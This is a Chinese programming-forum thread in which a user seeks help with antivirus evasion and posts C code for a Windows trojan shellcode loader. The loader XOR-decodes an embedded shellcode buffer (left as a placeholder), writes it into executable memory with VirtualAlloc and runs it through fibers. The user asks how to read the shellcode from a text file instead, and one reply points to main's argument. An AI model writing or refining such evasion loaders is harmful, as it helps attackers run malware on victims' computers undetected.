设为首页收藏本站
切换到窄版

鱼C论坛

 找回密码
 立即注册
鱼C论坛»论坛 资源分享 信安专区(十五派技术支持) 【免杀求助】求助大佬如何把木马里面的二进制文件写成可 ...
返回列表 发新帖
查看: 608|回复: 2

【免杀求助】求助大佬如何把木马里面的二进制文件写成可输出的,不要写死

[复制链接]
whitexee
发表于 2023-4-3 11:41:37 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
  1. #include <windows.h>

  3. void like()
  4. {
  5.     unsigned char data[] =
  6.      {
  7.     我的shellcode
  8.     };
  9.     LPVOID fiber = ConvertThreadToFiber(NULL);
  10.     LPVOID Alloc= VirtualAlloc(NULL,sizeof(data),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
  11.     for (int i = 0;i < sizeof(data);i++)
  12.     {
  13.         data[i] ^=99;
  14.     }
  15.     CopyMemory(Alloc,data,sizeof(data));
  16.      LPVOID shellFiber= CreateFiber(0,(LPFIBER_START_ROUTINE)Alloc,NULL);
  17.     SwitchToFiber(shellFiber);
  18. }
  19. int main()
  20. {
  21.     __asm
  22.     {
  23.         mov eax, offset data;
  24.         _emit 0xFF;
  25.         _emit 0xE0;
  26.     }
  27.     ((void(WINAPI*)(void)) & data)();
  28.     like();   
  29. }
复制代码


想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

whitexee
 楼主| 发表于 2023-4-7 09:48:03 | 显示全部楼层
我想在<我的shellcode>那里不用自己输入,可以直接读取.txt文件输入
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

xiaomanyi520
发表于 2024-4-23 21:50:08 | 显示全部楼层
可以利用main()函数第二个参数。
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2024-5-17 19:20

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表